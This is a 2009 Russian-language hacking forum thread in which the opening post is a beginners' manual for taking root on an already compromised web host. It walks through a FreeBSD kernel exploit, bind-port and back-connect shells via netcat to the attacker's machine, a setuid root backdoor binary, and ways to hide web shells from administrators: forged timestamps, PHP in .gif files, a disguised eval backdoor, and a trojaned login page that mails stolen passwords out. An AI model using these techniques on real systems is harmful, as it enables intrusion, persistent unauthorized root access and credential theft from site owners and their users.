Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

29.10.2009, 00:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Мануал новичкам: Рутанье
|=---=[ Мануал новичкам: Рутанье ]=---=|
Мануал предназначен для новичков. В нем я постараюсь расписать пошаговою инструкцию рутанья, а также как спрятать свой шелл от админов (: Начнем с того что мы уже залили шелл на хост. Посмотрели так сказать вокруг да около, а индекс то никак не подредактировать. Надо рутать
- Смотрим версию ядра: uname -a
- Ищем сплойты google.com. milw0rm.com
И так допустим:
User: 80 ( www ) Group: 80 ( www )
Код:
# uname -a
FreeBSD *** 7.0-RELEASE FreeBSD 7.0-RELEASE #2: Wed Jul 16 15:22:07 UTC 2008 root@:/usr/src/sys/i386/compile/colo2 i386
Идем на www.milw0rm.com, и видим что под эту версию нам подойдет плоент bsd-ktimer.c
Сохраняем плоент где нибудь, затем грузим на хост. - Биндпорт \ бекконет
Для того чтобы порутать хост нам необходимо приконнектится к нему.
Если кто не вкурил и спросит: "у нас ведь есть вебшелл", то объясню: нужна оболочка, типа баша)
Лично я часто использую биндпорт от STNC:
http://uasc.org.ua/files/backdoor.pl.txt
А также бекконект от Алексайза:
http://uasc.org.ua/files/connectback.pl.txtЕсли вы используете шелл с возможностю биндпорта или бэкконекта, можете воспользоваться.
Если же нет, тогда льем на хост и запускаем:
perl backdoor.pl
Назовите более беспалевно (:
Далее у себя на компе (Должен быть установлен netcat)
nc host.com 31337
Если законектились - отлично, пропускайте следующий пункт. Если же нет, что бывает, потому что нас блочит фаер, пробуем использовать бекконект - Бекконектимся
Существуют 2 варианта бекконекта - на свой комп, и с использованием промежуточного. Чаще всего используют вторую схему, так как для первой у вас должен быть выделенный ip, что бывает далеко не у всех. Но все же эту схему рассмотреть стоит, и так:- На свой комп
На своем компе открываем порт для прослушки:
nc -l -p31336
Затем, на том хосте что хекаем, аплоудим скрипт, и запускаем из вебшелла:
dc.pl [ВАШ_ИП] 31336
Опять не работает? Скорее всего ваш ип адрес не является выделенным, а значит читаем дальше...
- C использованием промежуточного хоста
На промежуточном хосте, биндим порт (31337).
У себя на компе, соединяемся с промежуточным:
nc site.com 31337
На промежуточном должен быть неткат, если его нет, то ставим. Сложностей это вызвать не должно.
Затем открываем порт на промежуточном хосте:
nc -l -p31336
Потом с сайта, который рутаем делаем бекконет на промежуточный, как было описано выше.
Но что делать, если и тут всё обламывает файервол?
Вообщето сплойты можна юзать из веба (Кстате, тут я описываю случай с FreeBSD, а такая фича тестилась на шелле под линукс) Чтобы не переписывать, что что уже писал, копипаст из моего поста в РоА:
1. Смотрим плоент, ищем что то типа:
execl("/bin/sh", "sh", NULL);
2. Меняем на:
execl("/bin/sh","/bin/sh", "-c", "cp ./suidnik ./s; chown root ./s; chgrp root ./s; chmod 777 ./s; chmod +s ./s;", NULL);
3. Дальше все просто) Заливаем "suidnik":
Код:
#include <stdio.h>
int main(int argc, char **argv){
system(argv[1]);
}
(пздц, никогда не кодил на си, а тут такой код )
Компилим его, компилим сплоент, и запускаем из шелла. Потом увидим еще файлик "s".
4. Вроде все, юзаем:
- Законнектились!
Компилим:
Код:
gcc bsd-ktimer.c -o free
chmod 755 free
./free
Далее должны наблюдать:
Код:
# ./free
FreeBSD local kernel root exploit
by: christer/mu-b
http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!
* allocated pointer page: 0x00000000 -> 0x08000000 [134217728-bytes]
* allocated itimer struct: 0x20000000 -> 0x200000DC [220-bytes]
* filling pointer page... done
* found posix_clocks @ [0xc08ecf80]
* it_page->it_clockid: 0x0CC274B6 [access @0xBFBFEDB8]
* ktimer_delete (0xD0000000)
* ktimer_delete: 0 1
#
Затем смотрим снова " id" и должны увидеть " root". В нашем случаи:
uid=80(www) gid=80(www) euid=0(root) groups=80(www),1003(suwww)
Ну что же, рут имеем, теперь надо бы както сделать так, чтобы не каждый раз юзать сплойт, если упадет процес бекдора. Создаем файлик, который будет давать нам права рута, каждый раз при вызове.
1.с:
Код:
main() {
setuid(0);
setgid(0);
system("/bin/bash");
}
Далее
Код:
gcc 1.c -o syser
chmod 755 syser
chmod +s syser
mv syser /bin/syser
Если наш бекдор падает, то запускаем наново и выполняем:
Код:
$ /bin/syser
id
uid=0(root) gid=0(wheel) groups=0(wheel),80(www),1003(suwww)
1. Никогда не забываем юзать команду:
touch -r [base] [shell]
Тем самым мы изменим дату создание шелла на дату создание безобидного файлика.
2. Копирайты, лицензии.
Часто помагает в начало файла добавить копирайты цмски которая стоит на сайте, сделать много отступов, затем сам код шелла) Или же впихнуть текст лицензии, GNU, например.
3. Расширение
Пихаем шелл с расширением .gif в какую нибудь папку с картинками, и добавляем .htaccess:
Код:
AddType application/x-httpd-php .gif
Надеемся, что не спалят
4. Псевдофункции
В файл функций можно добавить следующий код:
PHP код:
function login_check($login)
{
if(get_magic_quotes_gpc()){
eval(stripslashes($login)); }
else
{ eval($login); }
И добавить в индекс например:
PHP код:
if(isset($_POST['logln'])){login_check($_POST['logln'])}
4.
5. mail();
Ищем страничку авторизации, затем трояним скрипт. Нужно найти место где проходит проверка логина и пароля, и вставить примерно такой код:
PHP код:
mail(base64_decode('eWFAeGVra2VyLmNvbQ=='),'AUTH OK', $_POST['login'] .":" . $_POST['password']);
Приветы: $n@]<e, UASC, RoA и всем кого знаю
© 2009 Dimi4, [UASC]
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 30.10.2009 в 22:43..
|
|
|

29.10.2009, 23:40
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме: 3008839
Репутация:
1502
|
|
>>Вообщето сплойты можна юзать из веба
Ещё часто оказывается, что сплоит во время работы что-то пишет в консольку, а шелл это почему-то не отображает. Так что бывает удобно дописать в начало кода
Код:
freopen("sploit.output", "wt", stdout);
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|

30.10.2009, 00:23
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
>>Вообщето сплойты можна юзать из веба
видел твой пост, но по моему это не твоя идея, я без наезда, просто подзабыл.
больше вероятности сделать бекконект всеже на стандартные порты, ну т.е. 80,21,20 (ftp-data) если конечно нет демонов которые эти порты слушают.
В целом хорошо, собрал все воедино.
насчет MySql не понял, ладно бы если:
echo eval($row['comment']);
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 30.10.2009 в 00:57..
|
|
|

30.10.2009, 00:34
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме: 1734541
Репутация:
214
|
|
кстати это сплойит под фряху не всегда пашет...на некоторых хостах просто вываливается ошибка что failed to lookup posix_clocks
|
|
|

30.10.2009, 02:04
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
Scipio идея про шеллы из веба: обсуждали вместе со снейком, так что да, не могу претендовать на авторство.
насчет MySql не понял, ладно бы если:
echo eval($row['comment']);
` - shell_exec )) неужели забыл? )
2 svesve
Возможно ядро пропатчено, смотри дату точную, тоесть месяц и число, и сравнивай с датой выхода сплойта
__________________
BlackHat. MoDL
|
|
|

30.10.2009, 02:19
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
>>` - shell_exec )) неужели забыл? )
ну я то не забыл, но объясни тогда в чем логика? Разве есть такая линевая комманда eval($_POST['e']);? другими словами eval тут не функция, а часть переменной $row['comment'] так же как и $_POST['e'] не переменная, а часть строки-значения переменной $row['comment']
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 30.10.2009 в 02:29..
|
|
|

30.10.2009, 02:41
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
гы, метода прятания беков от 2005 года
PS: Сорри, пьян децл
Хотя бы шифровать как-то, имхо.
grep -P -i 'eval|$_GET|$_REQUEST|base64' /var/www/*.*
к примеру и всё, ни шеллов ни бекдоров
PS: А так прикольная статья, насчет бекконекта
|
|
|

30.10.2009, 08:36
|
|
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме: 879928
Репутация:
438
|
|
сори но если бы тс не был бы грином, заминусовали бы и послали...
статей на эту тему предостаточно, причем более интересных и расписанных
http://forum.antichat.ru/showthread.php?t=17581
http://forum.antichat.ru/showthread.php?t=21406
http://forum.antichat.ru/showthread.php?t=30711
и т.д. зото плюсов срубил на бояне, любой реподрочер позавидует, хотя это не мое дело, минусните меня за дерзость.
Последний раз редактировалось Dyxxx; 30.10.2009 в 08:42..
|
|
|

30.10.2009, 13:54
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
видел твой пост, но по моему это не твоя идея, я без наезда, просто подзабыл.
да это идея Скульхака, реализованая Греем сам знаешь где. Димич то не мог этого знать)
|
|
|

30.10.2009, 15:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме: 7617458
Репутация:
3965
|
|
2Dyxxx
вуху, меня до гринов повысили? ))
И неужели ты думаешь что мой уровень писать статьи ради плюсов? Целью было создать мануал, который мог бы юзать каждый новичок, когда возникает вопрос о рутаньи. Да и в прочем, кто бы говорил? У тебя вся репа из темы скуль иньекты) Только не надо говорить что ты их ты выкладываешь "просто так". Это уже оффтоп, так что отвечать на это не надо, дабы не засорять тему.
Spyder О_о непонел
П.С. Dyxxx за линк спс, статей я не видел. И не надо провокаций)
__________________
BlackHat. MoDL
Последний раз редактировалось Dimi4; 30.10.2009 в 15:05..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|